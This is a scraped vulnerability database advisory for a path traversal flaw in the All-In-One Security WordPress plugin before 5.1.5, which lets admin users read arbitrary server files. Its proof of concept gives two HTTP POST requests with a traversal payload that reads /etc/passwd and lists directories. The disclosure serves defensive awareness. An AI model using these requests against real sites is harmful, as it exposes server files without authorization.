Lucene search

K
wpvulndbBartłomiej MarekWPVDB-ID:CAF1DBB5-197E-41E9-8F48-BA1F2360A759
HistoryMar 20, 2023 - 12:00 a.m.

All-In-One Security (AIOS) < 5.1.5 - Admin+ Arbitrary File/Folder Access via Traversal

2023-03-2000:00:00
Bartłomiej Marek
wpscan.com
20
all-in-one security
aios
admin+ access
arbitrary file
file traversal
directory listing
security vulnerability
web application security
poc
server access

EPSS

0.001

Percentile

29.8%

The plugin does not limit what log files to display in it’s settings pages, allowing an authorized user (admin+) to view the contents of arbitrary files and list directories anywhere on the server (to which the web server has access). The plugin only displays the last 50 lines of the file.

PoC

POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab;=tab4 HTTP/2 Host: Cookie: Content-Length: 125 Content-Type: application/x-www-form-urlencoded _wpnonce=&aiowps;_system_log_file=…%2F…%2F…%2F…%2Fetc%2Fpasswd&aiowps;_search_error_files=View+latest+system+logs POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab;=tab4 HTTP/2 Host: Cookie: Content-Length: 98 Content-Type: application/x-www-form-urlencoded _wpnonce=&aiowps;_system_log_file=…%2F&aiowps;_search_error_files=View+latest+system+logs Replace values with <> signs.

EPSS

0.001

Percentile

29.8%

Related for WPVDB-ID:CAF1DBB5-197E-41E9-8F48-BA1F2360A759